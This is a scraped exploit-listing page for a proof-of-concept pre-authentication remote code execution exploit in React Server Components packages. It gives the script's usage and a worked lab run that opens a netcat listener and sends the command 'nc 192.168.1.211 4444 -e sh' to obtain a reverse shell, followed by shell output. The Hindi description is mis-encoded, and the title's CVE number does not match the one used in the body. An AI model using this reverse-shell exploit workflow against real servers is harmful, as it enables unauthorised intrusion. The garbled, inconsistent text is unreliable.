## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MASTERWOK-POC-CVE-2025-55182
# PoC: CVE-2026-33017
> React Server Components рдХреЗ рд╕рдВрд╕реНрдХрд░рдг 19.0.0, 19.1.0, 19.1.1 рдФрд░ 19.2.0 рдореЗрдВ рдкреНрд░реА-рдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди рд░рд┐рдореЛрдЯ рдХреЛрдб рдПрдХреНрдЬрд╝реАрдХреНрдпреВрд╢рди рднреЗрджреНрдпрддрд╛ рдореМрдЬреВрдж рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреИрдХреЗрдЬ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ: react-server-dom-parcel, react-server-dom-turbopack, рдФрд░ react-server-dom-webpackред рдХрдордЬреЛрд░ рдХреЛрдб рд╕рд░реНрд╡рд░ рдлрдВрдХреНрд╢рди рдПрдВрдбрдкреЙрдЗрдВрдЯреНрд╕ рдкрд░ HTTP рдЕрдиреБрд░реЛрдзреЛрдВ рд╕реЗ рдкреЗрд▓реЛрдб рдХреЛ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд░реВрдк рд╕реЗ рдбреАрд╕реАрд░рд┐рдпрд▓рд╛рдЗрдЬрд╝ рдХрд░рддрд╛ рд╣реИред
https://nvd.nist.gov/vuln/detail/CVE-2025-55182
* * *
## рдЙрдкрдпреЛрдЧ
root@kitploit:~
usage: CVE-2025-55182.py [-h] --command COMMAND target
PoC exploit: CVE-2025-55182
positional arguments:
target Target hostname
options:
-h, --help show this help message and exit
--command COMMAND Command to run on target
## рдЙрджрд╛рд╣рд░рдг
root@kitploit:~
# Create docker instance
docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182
# Start listener
nc -lnvp 4444
# Launch exploit
python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211 4444 -e sh"
# Should receive reverse shell in listener
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 43911
uname -a
Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux